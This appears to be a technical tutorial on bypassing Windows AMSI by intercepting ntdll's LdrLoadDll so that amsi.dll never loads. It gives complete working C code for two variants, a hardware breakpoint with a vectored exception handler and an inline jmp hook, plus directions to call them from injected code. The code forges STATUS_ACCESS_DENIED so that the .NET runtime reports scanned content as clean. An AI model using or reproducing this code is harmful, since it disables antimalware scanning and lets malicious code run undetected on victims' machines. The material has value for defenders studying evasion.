Bypassing AMSI at LdrLoadDll, either by inline-hooking the function or by placing a hardware breakpoint on it.
LdrLoadDll, exported by ntdll.dll, is where the documented loader APIs (LoadLibraryA, LoadLibraryW, LoadLibraryExA and LoadLibraryExW) all end up before a DLL is mapped into the process's address space, so intercepting LdrLoadDll covers every one of them at once. Its prototype is LdrLoadDll(PWSTR PathToFile, PULONG Flags, PUNICODE_STRING ModuleFileName, PHANDLE ModuleHandle). Two things to keep in mind: the function is undocumented, so that prototype is stable only by convention, and the interception only affects loads that happen after it is installed, so it has to be in place before the runtime first asks for amsi.dll.
A Look at CoreCLR source code
Looking at the CoreCLR source (the runtime for .NET Core) shows that when a buffer is scanned by AMSI, amsi.dll is loaded first and AmsiScanBuffer is then called on the buffer. If that initialization fails, the check reports the content as not detected. It is reasonable to assume the .NET Framework CLR behaves the same way.
Amsi::IsBlockedByAmsiScan
So when amsi.dll is requested through LdrLoadDll, we answer with STATUS_ACCESS_DENIED (0xC0000022) instead of loading it. The runtime treats the failed initialization as "nothing detected", and AMSI is effectively bypassed.
-
Resolve the address of LdrLoadDll and set a hardware (debug-register) execute breakpoint on it, with a vectored exception handler to catch the resulting single-step exception. When the handler fires at LdrLoadDll's entry, read the ModuleFileName argument: it is the third parameter, which on x64 arrives in R8 as a pointer to a UNICODE_STRING. If that name contains amsi.dll, emulate an immediate return: load the return address from [RSP] into RIP, add 8 to RSP to pop it, and place STATUS_ACCESS_DENIED in RAX. For any other DLL let the call proceed. amsi.dll is never mapped, and AMSI is bypassed. Two details matter in practice: debug registers belong to each thread's context, so the breakpoint only covers the threads it was set on, and a UNICODE_STRING is byte-counted and not necessarily NUL-terminated, so the name comparison must honour its Length field.
-
Alternatively, patch the start of LdrLoadDll with an unconditional jmp to our own replacement function. The replacement inspects the same ModuleFileName argument; if the DLL being loaded is amsi.dll it returns STATUS_ACCESS_DENIED straight away, and for every other DLL it must hand the call on to the original function (through a trampoline, or by temporarily restoring the overwritten bytes), otherwise every later load in the process fails. Unlike the hardware breakpoint, this modifies ntdll's code pages, which is exactly what integrity checks that compare the in-memory .text section against the on-disk image are built to catch.
-
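The following C is an added example written for this page, not the project's own code, and it covers both variants described above: the hardware-breakpoint handler and the inline jmp hook. The function names (names_amsi, deny_and_return, dr7_exec_enable, build_jmp_stub, install_hw_breakpoint, install_inline_hook) and the unhook/call/rehook pass-through in the inline variant are my choices, not something the page specifies. The struct ustr type mirrors the UNICODE_STRING layout so that the decision logic also compiles and can be exercised off Windows; the Windows-only parts sit under #ifdef _WIN32 and assume an x64 build. Sample DLL names used to exercise the matcher are constructed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#ifndef STATUS_ACCESS_DENIED
#define STATUS_ACCESS_DENIED 0xC0000022u   /* the NTSTATUS LdrLoadDll's caller will see */
#endif

/* Mirror of the Windows UNICODE_STRING layout so the decision logic also builds off-Windows. */
typedef uint16_t wc16;
struct ustr { uint16_t Length; uint16_t MaximumLength; wc16 *Buffer; };
static wc16 lower16(wc16 c) { return (c >= 'A' && c <= 'Z') ? (wc16)(c + 32) : c; }

/* True if ModuleFileName contains "amsi.dll" (ASCII case-insensitive). Length is in
   bytes and the buffer is not guaranteed to be NUL-terminated, so never use wcsstr here. */
bool names_amsi(const struct ustr *s) {
    static const char needle[] = "amsi.dll";
    size_t n = sizeof needle - 1, len = s->Length / sizeof(wc16);
    if (!s->Buffer || len < n) return false;
    for (size_t i = 0; i + n <= len; i++) {
        size_t k = 0;
        while (k < n && lower16(s->Buffer[i + k]) == (wc16)needle[k]) k++;
        if (k == n) return true;
    }
    return false;
}

/* Make the intercepted call "return" without executing it: pop the return address
   from [RSP] into RIP and hand STATUS_ACCESS_DENIED back in RAX. */
void deny_and_return(uint64_t *rip, uint64_t *rsp, uint64_t *rax) {
    *rip = *(const uint64_t *)(uintptr_t)*rsp;
    *rsp += 8;
    *rax = STATUS_ACCESS_DENIED;
}

/* DR7 value enabling an execute breakpoint in DR<slot>: set L<slot>, leave RW/LEN = 00. */
uint64_t dr7_exec_enable(unsigned slot) { return 1ull << (slot * 2); }

/* The 12-byte absolute jump used by the inline hook: mov rax, imm64 ; jmp rax. */
size_t build_jmp_stub(uint8_t out[12], uint64_t target) {
    out[0] = 0x48; out[1] = 0xB8;          /* REX.W mov rax, imm64 */
    memcpy(out + 2, &target, 8);           /* little-endian immediate */
    out[10] = 0xFF; out[11] = 0xE0;        /* jmp rax */
    return 12;
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
typedef NTSTATUS (NTAPI *LdrLoadDll_t)(PWSTR, PULONG, PUNICODE_STRING, PHANDLE);
static DWORD64 g_ldr;   /* address of ntdll!LdrLoadDll */

/* Variant 1: hardware breakpoint plus vectored exception handler. */
static LONG CALLBACK on_breakpoint(PEXCEPTION_POINTERS ep) {
    CONTEXT *c = ep->ContextRecord;
    if (ep->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP || c->Rip != g_ldr)
        return EXCEPTION_CONTINUE_SEARCH;
    if (names_amsi((const struct ustr *)(uintptr_t)c->R8))   /* 3rd argument lives in R8 */
        deny_and_return(&c->Rip, &c->Rsp, &c->Rax);
    else
        c->EFlags |= 0x10000;   /* RF flag: resume at LdrLoadDll without re-trapping */
    return EXCEPTION_CONTINUE_EXECUTION;
}

void install_hw_breakpoint(void) {
    g_ldr = (DWORD64)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrLoadDll");
    AddVectoredExceptionHandler(1, on_breakpoint);
    CONTEXT c = {0};
    c.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    c.Dr0 = g_ldr;
    c.Dr7 = dr7_exec_enable(0);
    SetThreadContext(GetCurrentThread(), &c);   /* DR0-DR7 are per thread: repeat for others */
}

/* Variant 2: inline jmp hook; non-AMSI loads are passed through by unhook/call/rehook. */
static uint8_t g_orig[12], g_stub[12];
static void write_code(const uint8_t *bytes) {
    DWORD old;
    VirtualProtect((LPVOID)g_ldr, 12, PAGE_EXECUTE_READWRITE, &old);
    memcpy((void *)(uintptr_t)g_ldr, bytes, 12);
    VirtualProtect((LPVOID)g_ldr, 12, old, &old);
    FlushInstructionCache(GetCurrentProcess(), (LPCVOID)g_ldr, 12);
}

static NTSTATUS NTAPI hooked_LdrLoadDll(PWSTR path, PULONG flags, PUNICODE_STRING name, PHANDLE mod) {
    if (names_amsi((const struct ustr *)name)) return (NTSTATUS)STATUS_ACCESS_DENIED;
    write_code(g_orig);   /* restore prologue, call the real function, re-apply the hook; */
    NTSTATUS st = ((LdrLoadDll_t)g_ldr)(path, flags, name, mod);
    write_code(g_stub);   /* simpler than a trampoline but racy if other threads load DLLs */
    return st;
}

void install_inline_hook(void) {
    g_ldr = (DWORD64)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrLoadDll");
    memcpy(g_orig, (const void *)(uintptr_t)g_ldr, 12);
    build_jmp_stub(g_stub, (uint64_t)(uintptr_t)hooked_LdrLoadDll);
    write_code(g_stub);
}
#endif
```

On Windows, call install_hw_breakpoint() (or install_inline_hook()) from the injected code before the runtime first touches AMSI; a subsequent LoadLibraryW(L"amsi.dll") then returns NULL. The breakpoint variant leaves ntdll's bytes untouched but only guards the threads whose debug registers were set, so a process that scans from a thread created later needs the same CONTEXT applied there; the inline variant guards every thread but leaves a 12-byte patch at the start of LdrLoadDll and, in this simple pass-through form, briefly unhooks while each non-AMSI load runs.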